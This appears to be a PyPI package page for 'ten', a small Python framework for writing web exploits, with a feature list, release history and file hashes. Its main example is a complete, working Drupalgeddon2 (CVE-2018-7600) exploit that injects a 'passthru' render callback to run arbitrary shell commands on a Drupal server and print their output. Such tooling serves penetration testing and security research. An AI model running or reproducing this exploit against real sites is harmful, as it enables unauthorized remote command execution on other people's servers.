A (small) web exploit framework

Project description

ten

My (small) web exploit framework. I got tired of writing standard code over and over again, so I made this. Makes code more concise, clearer, faster to write. Might be useful to you.

It helps with HTTP interactions, handling user input, providing clear output, handling files, and running shell commands.

Useful to build POCs, and convert them into full, documented exploits in a blink.

Documentation

Documentation is available here: https://cfreal.github.io/ten/.

It includes tutorials, quickstart guides, and the Python documentation.

Installation

Ten is available on PyPi.

$ pip install ten

Features

Input/output
- Arguments to the main function are automatically mapped to argparse
  - They can hold a default value, get documented, etc.
- Output is clear and readable
HTTP
- Improves the standard requests API
- Parse HTTP responses easily (regex, CSS selectors, forms)
- Turn BURP on and off in a blink
- Concurrency
- Lots more.
Data conversion
- Transform data: base64, hashing, query string, CSV, JSON, ...
- Available as a tool: tf
...

Example

Functional, fully documented Drupalgeddon2 exploit:

#!/usr/bin/env python3

from ten import *


@entry
@arg("url", "URL of the Drupal website to exploit")
@arg("command", "Command to run on the server. Defaults to `id`")
def main(url, command="id"):
    """Exploit for Drupalgeddon2 (CVE-2018-7600)."""

    session = ScopedSession(url)
    response = session.post(
        url,
        params={
            "q": "user/password",
            "name[#post_render][]": "passthru",
            "name[#markup]": command,
            "name[#type]": "markup",
        },
        data={"form_id": "user_pass", "_triggering_element_name": "name"},
    )
    try:
        form = response.form(id="user_pass")
    except FormNotFoundError:
        failure("Unable to find form in response")
    
    build_id = form["form_build_id"]
    response = session.post(
        url,
        params={
            "q": f"file/ajax/name/#value/{build_id}"
        },
        data={"form_build_id": build_id},
    )
    result = response.re.search(r"^(.*)\[{", flags=re.S)
    
    assume(result, "Unable to find command result in response")

    msg_success("Exploit done")
    msg_info("Command result:")

    msg_print(result.group(1))


main()

Project details

Release history Release notifications | RSS feed

This version

0.1.5

Oct 19, 2024

0.1.4

Sep 8, 2024

0.1.3

Sep 8, 2024

0.1.2

Sep 7, 2024

0.1.1

Sep 7, 2024

0.1.0

Sep 7, 2024

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

ten-0.1.5.tar.gz (44.7 kB view hashes)

Uploaded Oct 19, 2024 Source

Built Distribution

ten-0.1.5-py3-none-any.whl (53.4 kB view hashes)

Uploaded Oct 19, 2024 Python 3

Hashes for ten-0.1.5.tar.gz

Hashes for ten-0.1.5.tar.gz
Algorithm	Hash digest
SHA256	`4bd14394792e12ebdac7fc1d6aabbe69586c29dc7955f19fa6c4d82d503bb0da`
MD5	`dd8e67bff2561911e4070050eff23ade`
BLAKE2b-256	`9db78f22611ef676c01a17f2aa89798a6baca43b9549b4a6c123ff68d99c1d98`

Hashes for ten-0.1.5-py3-none-any.whl

Hashes for ten-0.1.5-py3-none-any.whl
Algorithm	Hash digest
SHA256	`a3a702bdfd1eb489b1cd8bd657fbf81cd2315e641bacde0c101c3659ec6a64be`
MD5	`469fbd7f919e3e66f2c94e153c6aaaff`
BLAKE2b-256	`addc2b28026d2ca8bbe4ae7429397156e33007cce45fa5eaae6d3aa042dc8251`